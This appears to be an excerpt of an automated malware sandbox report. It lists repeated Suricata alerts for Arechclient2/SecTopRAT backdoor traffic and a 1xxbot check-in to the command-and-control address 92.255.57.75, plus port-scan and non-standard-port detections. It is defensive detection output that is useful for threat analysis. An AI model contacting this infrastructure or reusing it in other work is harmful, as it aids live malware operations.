Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49943 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49866 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49905 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49917 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49918 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49956 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49911 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49969 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49962 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49988 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49949 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49982 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49924 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49931 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49950 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49997 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50016 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:49995 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49975 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49964 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50034 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49981 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:49995
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50034
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50021 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50014 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49994 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49886 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50027 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50035 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50041 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50047 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49898 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49937 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:49930 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50048 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50050 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50049 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50029 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50053 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50008 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50052 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50054 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50055 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50002 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50051 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50057 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50058 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50060 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50056 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50059 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50061 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2028984 - Severity 1 - ET MALWARE Win32/1xxbot CnC Checkin : 192.168.2.11:50062 -> 92.255.57.75:228
Source: Network traffic	Suricata IDS: 2028984 - Severity 1 - ET MALWARE Win32/1xxbot CnC Checkin : 192.168.2.11:50064 -> 92.255.57.75:80
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50065 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50066 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50067 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50068 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50069 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50070 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50071 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50072 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50073 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50074 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50075 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50076 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50077 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50078 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50079 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50080 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50081 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50082 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50083 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50085 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50087 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50088 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50089 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50091 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50090 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50092 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50093 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50063 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50095 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50094 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50096 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50095
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50097 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50098 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50100 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50101 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50102 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50103 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50104 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50105 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50106 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50108 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50107 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50109 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50110 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50111 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50112 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50099 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50109
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50113 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50114 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50107
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50115 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50116 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50117 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50120 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50122 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50123 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50121 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50124 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50126 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50125 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50127 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50128 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50129 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50131 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50126
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50130 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50131
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50119 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50134 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50133 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50136 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50135 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50084 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50086 -> 92.255.57.75:9000
Source: Network traffic	Suricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.11:50118 -> 92.255.57.75:15647
Source: Network traffic	Suricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 92.255.57.75:15647 -> 192.168.2.11:50118
Source: Network traffic	Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.11:50132 -> 92.255.57.75:9000

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 92.255.57.75 ports 9000,1,4,5,6,7,228,80,15647

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 49962 -> 9000
